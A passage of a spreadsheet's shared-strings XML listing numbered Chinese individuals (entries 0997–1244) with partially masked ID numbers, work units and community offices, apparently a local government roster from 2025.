    <t>张殿基</t>
  </si>
  <si>
    <t>0997</t>
  </si>
  <si>
    <t>李贵霞</t>
  </si>
  <si>
    <t>412921********0428</t>
  </si>
  <si>
    <t>0998</t>
  </si>
  <si>
    <t>翟广奇</t>
  </si>
  <si>
    <t>0999</t>
  </si>
  <si>
    <t>刘贵兰</t>
  </si>
  <si>
    <t>1000</t>
  </si>
  <si>
    <t>刘明山</t>
  </si>
  <si>
    <t>411326********0097</t>
  </si>
  <si>
    <t>1001</t>
  </si>
  <si>
    <t>黄廷超</t>
  </si>
  <si>
    <t>412921********0211</t>
  </si>
  <si>
    <t>1002</t>
  </si>
  <si>
    <t>尹海军</t>
  </si>
  <si>
    <t>1003</t>
  </si>
  <si>
    <t>尹昭杨</t>
  </si>
  <si>
    <t>411321********0057</t>
  </si>
  <si>
    <t>1004</t>
  </si>
  <si>
    <t>张振</t>
  </si>
  <si>
    <t>1005</t>
  </si>
  <si>
    <t>张傲</t>
  </si>
  <si>
    <t>1006</t>
  </si>
  <si>
    <t>郑慎贵</t>
  </si>
  <si>
    <t>1007</t>
  </si>
  <si>
    <t>王立有</t>
  </si>
  <si>
    <t>1008</t>
  </si>
  <si>
    <t>王天春</t>
  </si>
  <si>
    <t>1009</t>
  </si>
  <si>
    <t>王中奕</t>
  </si>
  <si>
    <t>411321********5191</t>
  </si>
  <si>
    <t>1010</t>
  </si>
  <si>
    <t>王天秀</t>
  </si>
  <si>
    <t>1011</t>
  </si>
  <si>
    <t>王俊霞</t>
  </si>
  <si>
    <t>1012</t>
  </si>
  <si>
    <t>王环波</t>
  </si>
  <si>
    <t>1013</t>
  </si>
  <si>
    <t>王环宁</t>
  </si>
  <si>
    <t>411321********0213</t>
  </si>
  <si>
    <t>1014</t>
  </si>
  <si>
    <t>马先英</t>
  </si>
  <si>
    <t>1015</t>
  </si>
  <si>
    <t>李玉振</t>
  </si>
  <si>
    <t>1016</t>
  </si>
  <si>
    <t>蔡平</t>
  </si>
  <si>
    <t>1017</t>
  </si>
  <si>
    <t>黄金桂</t>
  </si>
  <si>
    <t>1018</t>
  </si>
  <si>
    <t>广电局中华办理</t>
  </si>
  <si>
    <t>查光丽</t>
  </si>
  <si>
    <t>412921********4025</t>
  </si>
  <si>
    <t>1019</t>
  </si>
  <si>
    <t>粮食局中华社区办理</t>
  </si>
  <si>
    <t>牛清波</t>
  </si>
  <si>
    <t>1020</t>
  </si>
  <si>
    <t>民政局中华社区办理</t>
  </si>
  <si>
    <t>杨清源</t>
  </si>
  <si>
    <t>411321********1537</t>
  </si>
  <si>
    <t>1021</t>
  </si>
  <si>
    <t>双鹏有限公司中华社区办理</t>
  </si>
  <si>
    <t>刘宏中</t>
  </si>
  <si>
    <t>1022</t>
  </si>
  <si>
    <t>税务局中华办理</t>
  </si>
  <si>
    <t>王云</t>
  </si>
  <si>
    <t>1023</t>
  </si>
  <si>
    <t>古中先</t>
  </si>
  <si>
    <t>1024</t>
  </si>
  <si>
    <t>古中伟</t>
  </si>
  <si>
    <t>1025</t>
  </si>
  <si>
    <t>地税所中华社区</t>
  </si>
  <si>
    <t>王新雨</t>
  </si>
  <si>
    <t>1026</t>
  </si>
  <si>
    <t>商业中心中华社区</t>
  </si>
  <si>
    <t>张保剑</t>
  </si>
  <si>
    <t>412921********0412</t>
  </si>
  <si>
    <t>1027</t>
  </si>
  <si>
    <t>农机局中华社区办理</t>
  </si>
  <si>
    <t>和青丽</t>
  </si>
  <si>
    <t>1028</t>
  </si>
  <si>
    <t>工商局中华社区办理</t>
  </si>
  <si>
    <t>杨丰</t>
  </si>
  <si>
    <t>1029</t>
  </si>
  <si>
    <t>印刷厂西北社区办理</t>
  </si>
  <si>
    <t>杨雪野</t>
  </si>
  <si>
    <t>1030</t>
  </si>
  <si>
    <t>供销社西北社区办理</t>
  </si>
  <si>
    <t>许世彤</t>
  </si>
  <si>
    <t>1031</t>
  </si>
  <si>
    <t>黄华</t>
  </si>
  <si>
    <t>1032</t>
  </si>
  <si>
    <t>商贸公司西北办理</t>
  </si>
  <si>
    <t>王家续</t>
  </si>
  <si>
    <t>1033</t>
  </si>
  <si>
    <t>新兴实业有限公司西北办理</t>
  </si>
  <si>
    <t>李强</t>
  </si>
  <si>
    <t>412921********3616</t>
  </si>
  <si>
    <t>1034</t>
  </si>
  <si>
    <t>物华交电公司中华办理</t>
  </si>
  <si>
    <t>卢长坤</t>
  </si>
  <si>
    <t>1035</t>
  </si>
  <si>
    <t>工信局中华办理</t>
  </si>
  <si>
    <t>朱捍洋</t>
  </si>
  <si>
    <t>412921********0113</t>
  </si>
  <si>
    <t>1036</t>
  </si>
  <si>
    <t>外贸局中华办理</t>
  </si>
  <si>
    <t>赵乾</t>
  </si>
  <si>
    <t>1037</t>
  </si>
  <si>
    <t>赵汉钦</t>
  </si>
  <si>
    <t>1038</t>
  </si>
  <si>
    <t>粮食局中华办理</t>
  </si>
  <si>
    <t>陈亮</t>
  </si>
  <si>
    <t>1039</t>
  </si>
  <si>
    <t>农机局中华办理</t>
  </si>
  <si>
    <t>闫永华</t>
  </si>
  <si>
    <t>1040</t>
  </si>
  <si>
    <t>运输公司民主办理</t>
  </si>
  <si>
    <t>张彦彬</t>
  </si>
  <si>
    <t>411321********0016</t>
  </si>
  <si>
    <t>1041</t>
  </si>
  <si>
    <t>缫丝厂中华办理</t>
  </si>
  <si>
    <t>张玉众</t>
  </si>
  <si>
    <t>411326********0018</t>
  </si>
  <si>
    <t>1042</t>
  </si>
  <si>
    <t>财险公司东北办理</t>
  </si>
  <si>
    <t>陈金玲</t>
  </si>
  <si>
    <t>1043</t>
  </si>
  <si>
    <t>二建南外办理</t>
  </si>
  <si>
    <t>刘杰炘</t>
  </si>
  <si>
    <t>411321********2434</t>
  </si>
  <si>
    <t>1044</t>
  </si>
  <si>
    <t>任付勤</t>
  </si>
  <si>
    <t>1045</t>
  </si>
  <si>
    <t>刘清峰</t>
  </si>
  <si>
    <t>1046</t>
  </si>
  <si>
    <t>张振全</t>
  </si>
  <si>
    <t>1047</t>
  </si>
  <si>
    <t>张华勤</t>
  </si>
  <si>
    <t>1048</t>
  </si>
  <si>
    <t>医药局西北办理</t>
  </si>
  <si>
    <t>赵现伟</t>
  </si>
  <si>
    <t>412921********4436</t>
  </si>
  <si>
    <t>1049</t>
  </si>
  <si>
    <t>陈清</t>
  </si>
  <si>
    <t>412921********4529</t>
  </si>
  <si>
    <t>1050</t>
  </si>
  <si>
    <t>冯朝忠</t>
  </si>
  <si>
    <t>412921********2412</t>
  </si>
  <si>
    <t>1051</t>
  </si>
  <si>
    <t>冯中良</t>
  </si>
  <si>
    <t>1052</t>
  </si>
  <si>
    <t>商业局西北办理</t>
  </si>
  <si>
    <t>武晓东</t>
  </si>
  <si>
    <t>1053</t>
  </si>
  <si>
    <t>物资局中华办理</t>
  </si>
  <si>
    <t>董秋生</t>
  </si>
  <si>
    <t>1054</t>
  </si>
  <si>
    <t>侯正阳</t>
  </si>
  <si>
    <t>1055</t>
  </si>
  <si>
    <t>农业局民主办理</t>
  </si>
  <si>
    <t>李假</t>
  </si>
  <si>
    <t>1056</t>
  </si>
  <si>
    <t>范永清</t>
  </si>
  <si>
    <t>1057</t>
  </si>
  <si>
    <t>刘中兰</t>
  </si>
  <si>
    <t>1058</t>
  </si>
  <si>
    <t>农业局（民主社区办理）</t>
  </si>
  <si>
    <t>周丰一</t>
  </si>
  <si>
    <t>1059</t>
  </si>
  <si>
    <t>郝钰淇</t>
  </si>
  <si>
    <t>1060</t>
  </si>
  <si>
    <t>二建（民主社区办理）</t>
  </si>
  <si>
    <t>程远秀</t>
  </si>
  <si>
    <t>1061</t>
  </si>
  <si>
    <t>二建（南外社区办理）</t>
  </si>
  <si>
    <t>412921********2837</t>
  </si>
  <si>
    <t>1062</t>
  </si>
  <si>
    <t>方利霞</t>
  </si>
  <si>
    <t>1063</t>
  </si>
  <si>
    <t>贺天属</t>
  </si>
  <si>
    <t>411326********0057</t>
  </si>
  <si>
    <t>1064</t>
  </si>
  <si>
    <t>物资局（中华办理）</t>
  </si>
  <si>
    <t>赵会平</t>
  </si>
  <si>
    <t>412921********3344</t>
  </si>
  <si>
    <t>1065</t>
  </si>
  <si>
    <t>西北二组</t>
  </si>
  <si>
    <t>孙月</t>
  </si>
  <si>
    <t>1066</t>
  </si>
  <si>
    <t>砖瓦厂北外办理</t>
  </si>
  <si>
    <t>王付太</t>
  </si>
  <si>
    <t>412921********1552</t>
  </si>
  <si>
    <t>1067</t>
  </si>
  <si>
    <t>赵锋远</t>
  </si>
  <si>
    <t>1068</t>
  </si>
  <si>
    <t>庆晓丽</t>
  </si>
  <si>
    <t>1069</t>
  </si>
  <si>
    <t>郭曾懋</t>
  </si>
  <si>
    <t>411326********0019</t>
  </si>
  <si>
    <t>1070</t>
  </si>
  <si>
    <t>饮食服务公司中华办理</t>
  </si>
  <si>
    <t>李梓豪</t>
  </si>
  <si>
    <t>411321********5330</t>
  </si>
  <si>
    <t>1071</t>
  </si>
  <si>
    <t>李梓瑜</t>
  </si>
  <si>
    <t>1072</t>
  </si>
  <si>
    <t>蚕业局中华办理</t>
  </si>
  <si>
    <t>陈玉修</t>
  </si>
  <si>
    <t>1073</t>
  </si>
  <si>
    <t>王佳妮</t>
  </si>
  <si>
    <t>1074</t>
  </si>
  <si>
    <t>剧团西北办理</t>
  </si>
  <si>
    <t>田宏兴</t>
  </si>
  <si>
    <t>1075</t>
  </si>
  <si>
    <t>田红瑞</t>
  </si>
  <si>
    <t>412921********552X</t>
  </si>
  <si>
    <t>1076</t>
  </si>
  <si>
    <t>朱秀勤</t>
  </si>
  <si>
    <t>1077</t>
  </si>
  <si>
    <t>丁峰</t>
  </si>
  <si>
    <t>1078</t>
  </si>
  <si>
    <t>丁照航</t>
  </si>
  <si>
    <t>1079</t>
  </si>
  <si>
    <t>杨立英</t>
  </si>
  <si>
    <t>1080</t>
  </si>
  <si>
    <t>林业局（北外办理）</t>
  </si>
  <si>
    <t>王昌昊</t>
  </si>
  <si>
    <t>411321********6117</t>
  </si>
  <si>
    <t>1081</t>
  </si>
  <si>
    <t>巢丝厂（民主办理）</t>
  </si>
  <si>
    <t>王军</t>
  </si>
  <si>
    <t>1082</t>
  </si>
  <si>
    <t>法院（民主社区办理）</t>
  </si>
  <si>
    <t>田周文</t>
  </si>
  <si>
    <t>411321********0318</t>
  </si>
  <si>
    <t>1083</t>
  </si>
  <si>
    <t>田周武</t>
  </si>
  <si>
    <t>411321********0334</t>
  </si>
  <si>
    <t>1084</t>
  </si>
  <si>
    <t>榆木厂（民主办理）</t>
  </si>
  <si>
    <t>李振晓</t>
  </si>
  <si>
    <t>1085</t>
  </si>
  <si>
    <t>朱艳</t>
  </si>
  <si>
    <t>412921********5541</t>
  </si>
  <si>
    <t>1086</t>
  </si>
  <si>
    <t>席云凯</t>
  </si>
  <si>
    <t>1087</t>
  </si>
  <si>
    <t>岳朝昱</t>
  </si>
  <si>
    <t>1088</t>
  </si>
  <si>
    <t>赵俊峰</t>
  </si>
  <si>
    <t>412921********5825</t>
  </si>
  <si>
    <t>1089</t>
  </si>
  <si>
    <t>饮食服务公司（ 中华办理）</t>
  </si>
  <si>
    <t>张青</t>
  </si>
  <si>
    <t>411326********0049</t>
  </si>
  <si>
    <t>1090</t>
  </si>
  <si>
    <t>蚕业局（中华办理）</t>
  </si>
  <si>
    <t>刘玉忠</t>
  </si>
  <si>
    <t>1091</t>
  </si>
  <si>
    <t>向瑞刚</t>
  </si>
  <si>
    <t>1092</t>
  </si>
  <si>
    <t>党龙咸</t>
  </si>
  <si>
    <t>1093</t>
  </si>
  <si>
    <t>王淑敏</t>
  </si>
  <si>
    <t>1094</t>
  </si>
  <si>
    <t>李雨欣</t>
  </si>
  <si>
    <t>411322********1348</t>
  </si>
  <si>
    <t>1095</t>
  </si>
  <si>
    <t>水利局（中华办理）</t>
  </si>
  <si>
    <t>李崇高</t>
  </si>
  <si>
    <t>411321********2815</t>
  </si>
  <si>
    <t>1096</t>
  </si>
  <si>
    <t>杨景玲</t>
  </si>
  <si>
    <t>412921********3361</t>
  </si>
  <si>
    <t>1097</t>
  </si>
  <si>
    <t>房管局（中华办理）</t>
  </si>
  <si>
    <t>焦心霞</t>
  </si>
  <si>
    <t>1098</t>
  </si>
  <si>
    <t>电线厂（中华办理）</t>
  </si>
  <si>
    <t>王小京</t>
  </si>
  <si>
    <t>1099</t>
  </si>
  <si>
    <t>外贸局（中华办理）</t>
  </si>
  <si>
    <t>陈莉</t>
  </si>
  <si>
    <t>1100</t>
  </si>
  <si>
    <t>木器厂（中华办理）</t>
  </si>
  <si>
    <t>陈建德</t>
  </si>
  <si>
    <t>1101</t>
  </si>
  <si>
    <t>李士伟</t>
  </si>
  <si>
    <t>1102</t>
  </si>
  <si>
    <t>刘龙圃</t>
  </si>
  <si>
    <t>412921********3629</t>
  </si>
  <si>
    <t>1103</t>
  </si>
  <si>
    <t>张平</t>
  </si>
  <si>
    <t>412921********0427</t>
  </si>
  <si>
    <t>1104</t>
  </si>
  <si>
    <t>周庆焕</t>
  </si>
  <si>
    <t>1105</t>
  </si>
  <si>
    <t>蔺玉华</t>
  </si>
  <si>
    <t>1106</t>
  </si>
  <si>
    <t>巢丝厂（中华办理）</t>
  </si>
  <si>
    <t>姚玉伟</t>
  </si>
  <si>
    <t>412921********5252</t>
  </si>
  <si>
    <t>1107</t>
  </si>
  <si>
    <t>水文站（南外办理）</t>
  </si>
  <si>
    <t>段国祥</t>
  </si>
  <si>
    <t>412921********2812</t>
  </si>
  <si>
    <t>1108</t>
  </si>
  <si>
    <t>木材公司（中华办理）</t>
  </si>
  <si>
    <t>周万吉</t>
  </si>
  <si>
    <t>412921********3618</t>
  </si>
  <si>
    <t>1109</t>
  </si>
  <si>
    <t>新华书店（西北办理）</t>
  </si>
  <si>
    <t>412921********3638</t>
  </si>
  <si>
    <t>1110</t>
  </si>
  <si>
    <t>黄瑞芳</t>
  </si>
  <si>
    <t>1111</t>
  </si>
  <si>
    <t>李翘楚</t>
  </si>
  <si>
    <t>411326********1523</t>
  </si>
  <si>
    <t>1112</t>
  </si>
  <si>
    <t>张海顺</t>
  </si>
  <si>
    <t>1113</t>
  </si>
  <si>
    <t>民政局（中华社区）</t>
  </si>
  <si>
    <t>杨立兰</t>
  </si>
  <si>
    <t>1114</t>
  </si>
  <si>
    <t>张家立</t>
  </si>
  <si>
    <t>1115</t>
  </si>
  <si>
    <t>黄金局（东北社区）</t>
  </si>
  <si>
    <t>毛庆秋</t>
  </si>
  <si>
    <t>1116</t>
  </si>
  <si>
    <t>褚清玉</t>
  </si>
  <si>
    <t>1117</t>
  </si>
  <si>
    <t>范梓霖</t>
  </si>
  <si>
    <t>411326********0028</t>
  </si>
  <si>
    <t>1118</t>
  </si>
  <si>
    <t>刘发勤</t>
  </si>
  <si>
    <t>1119</t>
  </si>
  <si>
    <t>潘伟</t>
  </si>
  <si>
    <t>1120</t>
  </si>
  <si>
    <t>孙若童</t>
  </si>
  <si>
    <t>411321********622X</t>
  </si>
  <si>
    <t>1121</t>
  </si>
  <si>
    <t>朱振全</t>
  </si>
  <si>
    <t>1122</t>
  </si>
  <si>
    <t>砖瓦厂（北外办理）</t>
  </si>
  <si>
    <t>张富权</t>
  </si>
  <si>
    <t>411321********0512</t>
  </si>
  <si>
    <t>1123</t>
  </si>
  <si>
    <t>曾志群</t>
  </si>
  <si>
    <t>412921********0546</t>
  </si>
  <si>
    <t>1124</t>
  </si>
  <si>
    <t>张奇云</t>
  </si>
  <si>
    <t>1125</t>
  </si>
  <si>
    <t>李忠</t>
  </si>
  <si>
    <t>1126</t>
  </si>
  <si>
    <t>商务局（中华办理）</t>
  </si>
  <si>
    <t>仝岩</t>
  </si>
  <si>
    <t>412921********151X</t>
  </si>
  <si>
    <t>1127</t>
  </si>
  <si>
    <t>仝闻铎</t>
  </si>
  <si>
    <t>1128</t>
  </si>
  <si>
    <t>郭延申</t>
  </si>
  <si>
    <t>1129</t>
  </si>
  <si>
    <t>方彬彬</t>
  </si>
  <si>
    <t>1130</t>
  </si>
  <si>
    <t>司法局（中华办理）</t>
  </si>
  <si>
    <t>郝依依</t>
  </si>
  <si>
    <t>411321********556X</t>
  </si>
  <si>
    <t>1131</t>
  </si>
  <si>
    <t>席文德</t>
  </si>
  <si>
    <t>1132</t>
  </si>
  <si>
    <t>吴鹏</t>
  </si>
  <si>
    <t>1133</t>
  </si>
  <si>
    <t>民主社区</t>
  </si>
  <si>
    <t>王文晨</t>
  </si>
  <si>
    <t>411326********0051</t>
  </si>
  <si>
    <t>1134</t>
  </si>
  <si>
    <t>吴志山</t>
  </si>
  <si>
    <t>412921********0111</t>
  </si>
  <si>
    <t>1135</t>
  </si>
  <si>
    <t>张新</t>
  </si>
  <si>
    <t>1136</t>
  </si>
  <si>
    <t>樊锋</t>
  </si>
  <si>
    <t>411326********0035</t>
  </si>
  <si>
    <t>1137</t>
  </si>
  <si>
    <t>樊思彤</t>
  </si>
  <si>
    <t>411321********0040</t>
  </si>
  <si>
    <t>1138</t>
  </si>
  <si>
    <t>王旺</t>
  </si>
  <si>
    <t>1139</t>
  </si>
  <si>
    <t>机械厂（中华办理）</t>
  </si>
  <si>
    <t>黄荣范</t>
  </si>
  <si>
    <t>1140</t>
  </si>
  <si>
    <t>刘小梅</t>
  </si>
  <si>
    <t>1141</t>
  </si>
  <si>
    <t>郭洪霞</t>
  </si>
  <si>
    <t>1142</t>
  </si>
  <si>
    <t>刘国清</t>
  </si>
  <si>
    <t>1143</t>
  </si>
  <si>
    <t>张聚风</t>
  </si>
  <si>
    <t>1144</t>
  </si>
  <si>
    <t>吴桂荣</t>
  </si>
  <si>
    <t>1145</t>
  </si>
  <si>
    <t>二建（中华办理）</t>
  </si>
  <si>
    <t>聂建伟</t>
  </si>
  <si>
    <t>1146</t>
  </si>
  <si>
    <t>缫丝厂（中华办理）</t>
  </si>
  <si>
    <t>曹媛</t>
  </si>
  <si>
    <t>1147</t>
  </si>
  <si>
    <t>高志国</t>
  </si>
  <si>
    <t>412921********3619</t>
  </si>
  <si>
    <t>1148</t>
  </si>
  <si>
    <t>李明会</t>
  </si>
  <si>
    <t>1149</t>
  </si>
  <si>
    <t>孙建叶</t>
  </si>
  <si>
    <t>1150</t>
  </si>
  <si>
    <t>张珂</t>
  </si>
  <si>
    <t>1151</t>
  </si>
  <si>
    <t>王伟</t>
  </si>
  <si>
    <t>1152</t>
  </si>
  <si>
    <t>粮局（中华办理）</t>
  </si>
  <si>
    <t>蔡长兰</t>
  </si>
  <si>
    <t>412921********0420</t>
  </si>
  <si>
    <t>1153</t>
  </si>
  <si>
    <t>中华四组</t>
  </si>
  <si>
    <t>崔建东</t>
  </si>
  <si>
    <t>1154</t>
  </si>
  <si>
    <t>陈舒</t>
  </si>
  <si>
    <t>1155</t>
  </si>
  <si>
    <t>谷秀宽</t>
  </si>
  <si>
    <t>1156</t>
  </si>
  <si>
    <t>杜平</t>
  </si>
  <si>
    <t>1157</t>
  </si>
  <si>
    <t>配件厂（中华社区）</t>
  </si>
  <si>
    <t>曾泓晔</t>
  </si>
  <si>
    <t>411321********0293</t>
  </si>
  <si>
    <t>2025年4月</t>
  </si>
  <si>
    <t>1158</t>
  </si>
  <si>
    <t>曹振甫</t>
  </si>
  <si>
    <t>412921********3333</t>
  </si>
  <si>
    <t>1159</t>
  </si>
  <si>
    <t>李小锋</t>
  </si>
  <si>
    <t>412322********4822</t>
  </si>
  <si>
    <t>1160</t>
  </si>
  <si>
    <t>董可鑫</t>
  </si>
  <si>
    <t>411321********0127</t>
  </si>
  <si>
    <t>2025年5月</t>
  </si>
  <si>
    <t>1161</t>
  </si>
  <si>
    <t>董若琳</t>
  </si>
  <si>
    <t>411321********0340</t>
  </si>
  <si>
    <t>1162</t>
  </si>
  <si>
    <t>中华</t>
  </si>
  <si>
    <t>王付珍</t>
  </si>
  <si>
    <t>1163</t>
  </si>
  <si>
    <t>许秀芝</t>
  </si>
  <si>
    <t>1164</t>
  </si>
  <si>
    <t>刘会焕</t>
  </si>
  <si>
    <t>412921********0108</t>
  </si>
  <si>
    <t>1165</t>
  </si>
  <si>
    <t>崔峥嵘</t>
  </si>
  <si>
    <t>1166</t>
  </si>
  <si>
    <t>孙国歧</t>
  </si>
  <si>
    <t>412921********403X</t>
  </si>
  <si>
    <t>1167</t>
  </si>
  <si>
    <t>城郊乡</t>
  </si>
  <si>
    <t>任秀婷</t>
  </si>
  <si>
    <t>412921********4465</t>
  </si>
  <si>
    <t>4113210299</t>
  </si>
  <si>
    <t>1168</t>
  </si>
  <si>
    <t>任成法</t>
  </si>
  <si>
    <t>412921********4454</t>
  </si>
  <si>
    <t>1169</t>
  </si>
  <si>
    <t>胡俊相</t>
  </si>
  <si>
    <t>412921********0411</t>
  </si>
  <si>
    <t>1170</t>
  </si>
  <si>
    <t>胡国森</t>
  </si>
  <si>
    <t>411321********0056</t>
  </si>
  <si>
    <t>1171</t>
  </si>
  <si>
    <t>靳小虎</t>
  </si>
  <si>
    <t>412921********0432</t>
  </si>
  <si>
    <t>1172</t>
  </si>
  <si>
    <t>靳小青</t>
  </si>
  <si>
    <t>412921********0423</t>
  </si>
  <si>
    <t>1173</t>
  </si>
  <si>
    <t>段洪如</t>
  </si>
  <si>
    <t>1174</t>
  </si>
  <si>
    <t>张自修</t>
  </si>
  <si>
    <t>412921********6034</t>
  </si>
  <si>
    <t>1175</t>
  </si>
  <si>
    <t>刘元正</t>
  </si>
  <si>
    <t>412921********061X</t>
  </si>
  <si>
    <t>1176</t>
  </si>
  <si>
    <t>冯居萍</t>
  </si>
  <si>
    <t>1177</t>
  </si>
  <si>
    <t>董亚涵</t>
  </si>
  <si>
    <t>411321********3628</t>
  </si>
  <si>
    <t>1178</t>
  </si>
  <si>
    <t>吴国敏</t>
  </si>
  <si>
    <t>1179</t>
  </si>
  <si>
    <t>韩国欣</t>
  </si>
  <si>
    <t>412921********0434</t>
  </si>
  <si>
    <t>1180</t>
  </si>
  <si>
    <t>段召运</t>
  </si>
  <si>
    <t>1181</t>
  </si>
  <si>
    <t>岳良</t>
  </si>
  <si>
    <t>412921********0453</t>
  </si>
  <si>
    <t>1182</t>
  </si>
  <si>
    <t>岳凡杰</t>
  </si>
  <si>
    <t>411326********0419</t>
  </si>
  <si>
    <t>1183</t>
  </si>
  <si>
    <t>周敏</t>
  </si>
  <si>
    <t>1184</t>
  </si>
  <si>
    <t>宋学礼</t>
  </si>
  <si>
    <t>412921********0414</t>
  </si>
  <si>
    <t>1185</t>
  </si>
  <si>
    <t>杨之丽</t>
  </si>
  <si>
    <t>1186</t>
  </si>
  <si>
    <t>杨双琳</t>
  </si>
  <si>
    <t>411321********0412</t>
  </si>
  <si>
    <t>1187</t>
  </si>
  <si>
    <t>城郊校委会</t>
  </si>
  <si>
    <t>尚兴龙</t>
  </si>
  <si>
    <t>412921********1117</t>
  </si>
  <si>
    <t>1188</t>
  </si>
  <si>
    <t>王娜</t>
  </si>
  <si>
    <t>412921********0443</t>
  </si>
  <si>
    <t>1189</t>
  </si>
  <si>
    <t>前庄村</t>
  </si>
  <si>
    <t>栗荣根</t>
  </si>
  <si>
    <t>1190</t>
  </si>
  <si>
    <t>尹语欣</t>
  </si>
  <si>
    <t>411321********0467</t>
  </si>
  <si>
    <t>1191</t>
  </si>
  <si>
    <t>尹学桦</t>
  </si>
  <si>
    <t>411321********0407</t>
  </si>
  <si>
    <t>1192</t>
  </si>
  <si>
    <t>尹学森</t>
  </si>
  <si>
    <t>411321********0215</t>
  </si>
  <si>
    <t>1193</t>
  </si>
  <si>
    <t>闫沟村</t>
  </si>
  <si>
    <t>屈向军</t>
  </si>
  <si>
    <t>412921********0417</t>
  </si>
  <si>
    <t>1194</t>
  </si>
  <si>
    <t>城郊供销社</t>
  </si>
  <si>
    <t>1195</t>
  </si>
  <si>
    <t>彭中盈</t>
  </si>
  <si>
    <t>412921********0425</t>
  </si>
  <si>
    <t>1196</t>
  </si>
  <si>
    <t>留山镇</t>
  </si>
  <si>
    <t>刘喜中</t>
  </si>
  <si>
    <t>412921********0731</t>
  </si>
  <si>
    <t>1197</t>
  </si>
  <si>
    <t>刘得荣</t>
  </si>
  <si>
    <t>412921********0726</t>
  </si>
  <si>
    <t>1198</t>
  </si>
  <si>
    <t>唐花林</t>
  </si>
  <si>
    <t>412921********0725</t>
  </si>
  <si>
    <t>1199</t>
  </si>
  <si>
    <t>王奎</t>
  </si>
  <si>
    <t>412921********0735</t>
  </si>
  <si>
    <t>1200</t>
  </si>
  <si>
    <t>刘长荣</t>
  </si>
  <si>
    <t>412921********0723</t>
  </si>
  <si>
    <t>1201</t>
  </si>
  <si>
    <t>赵玉焕</t>
  </si>
  <si>
    <t>412921********0721</t>
  </si>
  <si>
    <t>1202</t>
  </si>
  <si>
    <t>班凤香</t>
  </si>
  <si>
    <t>412921********0722</t>
  </si>
  <si>
    <t>1203</t>
  </si>
  <si>
    <t>唐青林</t>
  </si>
  <si>
    <t>412921********0713</t>
  </si>
  <si>
    <t>1204</t>
  </si>
  <si>
    <t>任德珍</t>
  </si>
  <si>
    <t>1205</t>
  </si>
  <si>
    <t>王朝玲</t>
  </si>
  <si>
    <t>412921********2488</t>
  </si>
  <si>
    <t>1206</t>
  </si>
  <si>
    <t>焦成梅</t>
  </si>
  <si>
    <t>1207</t>
  </si>
  <si>
    <t>余长青</t>
  </si>
  <si>
    <t>412921********0733</t>
  </si>
  <si>
    <t>1208</t>
  </si>
  <si>
    <t>余付云</t>
  </si>
  <si>
    <t>411321********2847</t>
  </si>
  <si>
    <t>1209</t>
  </si>
  <si>
    <t>郭伟</t>
  </si>
  <si>
    <t>412921********043X</t>
  </si>
  <si>
    <t>1210</t>
  </si>
  <si>
    <t>黄志平</t>
  </si>
  <si>
    <t>1211</t>
  </si>
  <si>
    <t>刘长聚</t>
  </si>
  <si>
    <t>412921********0734</t>
  </si>
  <si>
    <t>1212</t>
  </si>
  <si>
    <t>仝运焕</t>
  </si>
  <si>
    <t>412921********092X</t>
  </si>
  <si>
    <t>1213</t>
  </si>
  <si>
    <t>郭玉花</t>
  </si>
  <si>
    <t>412921********0727</t>
  </si>
  <si>
    <t>1214</t>
  </si>
  <si>
    <t>刘长德</t>
  </si>
  <si>
    <t>412921********0736</t>
  </si>
  <si>
    <t>1215</t>
  </si>
  <si>
    <t>唐合林</t>
  </si>
  <si>
    <t>412921********0730</t>
  </si>
  <si>
    <t>1216</t>
  </si>
  <si>
    <t>张德玲</t>
  </si>
  <si>
    <t>412921********2449</t>
  </si>
  <si>
    <t>1217</t>
  </si>
  <si>
    <t>杨德敏</t>
  </si>
  <si>
    <t>412921********0719</t>
  </si>
  <si>
    <t>1218</t>
  </si>
  <si>
    <t>许九梅</t>
  </si>
  <si>
    <t>412921********0720</t>
  </si>
  <si>
    <t>1219</t>
  </si>
  <si>
    <t>王永周</t>
  </si>
  <si>
    <t>412921********071X</t>
  </si>
  <si>
    <t>1220</t>
  </si>
  <si>
    <t>董兰</t>
  </si>
  <si>
    <t>412921********0785</t>
  </si>
  <si>
    <t>1221</t>
  </si>
  <si>
    <t>唐森林</t>
  </si>
  <si>
    <t>412921********0715</t>
  </si>
  <si>
    <t>1222</t>
  </si>
  <si>
    <t>冯付英</t>
  </si>
  <si>
    <t>412921********0745</t>
  </si>
  <si>
    <t>1223</t>
  </si>
  <si>
    <t>唐树林</t>
  </si>
  <si>
    <t>412921********0739</t>
  </si>
  <si>
    <t>1224</t>
  </si>
  <si>
    <t>孙士青</t>
  </si>
  <si>
    <t>412921********0764</t>
  </si>
  <si>
    <t>1225</t>
  </si>
  <si>
    <t>杨清然</t>
  </si>
  <si>
    <t>412921********0714</t>
  </si>
  <si>
    <t>1226</t>
  </si>
  <si>
    <t>杜长连</t>
  </si>
  <si>
    <t>1227</t>
  </si>
  <si>
    <t>孙五</t>
  </si>
  <si>
    <t>1228</t>
  </si>
  <si>
    <t>1229</t>
  </si>
  <si>
    <t>唐拴林</t>
  </si>
  <si>
    <t>412921********0716</t>
  </si>
  <si>
    <t>1230</t>
  </si>
  <si>
    <t>孟庆海</t>
  </si>
  <si>
    <t>412921********0738</t>
  </si>
  <si>
    <t>1231</t>
  </si>
  <si>
    <t>李桂琴</t>
  </si>
  <si>
    <t>1232</t>
  </si>
  <si>
    <t>刘亮中</t>
  </si>
  <si>
    <t>412921********0737</t>
  </si>
  <si>
    <t>1233</t>
  </si>
  <si>
    <t>张全华</t>
  </si>
  <si>
    <t>412921********0803</t>
  </si>
  <si>
    <t>1234</t>
  </si>
  <si>
    <t>王树欣</t>
  </si>
  <si>
    <t>412921********0748</t>
  </si>
  <si>
    <t>1235</t>
  </si>
  <si>
    <t>刘元中</t>
  </si>
  <si>
    <t>412921********0755</t>
  </si>
  <si>
    <t>1236</t>
  </si>
  <si>
    <t>刘青中</t>
  </si>
  <si>
    <t>1237</t>
  </si>
  <si>
    <t xml:space="preserve">郭金瑞 </t>
  </si>
  <si>
    <t>1238</t>
  </si>
  <si>
    <t>刘运中</t>
  </si>
  <si>
    <t>1239</t>
  </si>
  <si>
    <t>刘正中</t>
  </si>
  <si>
    <t>1240</t>
  </si>
  <si>
    <t>刘明中</t>
  </si>
  <si>
    <t>412921********0753</t>
  </si>
  <si>
    <t>1241</t>
  </si>
  <si>
    <t>唐畄拴</t>
  </si>
  <si>
    <t>412921********0732</t>
  </si>
  <si>
    <t>1242</t>
  </si>
  <si>
    <t>王坤</t>
  </si>
  <si>
    <t>412921********0717</t>
  </si>
  <si>
    <t>1243</t>
  </si>
  <si>
    <t>王运秀</t>
  </si>
  <si>
    <t>1244</t>
  </si>
  <si>
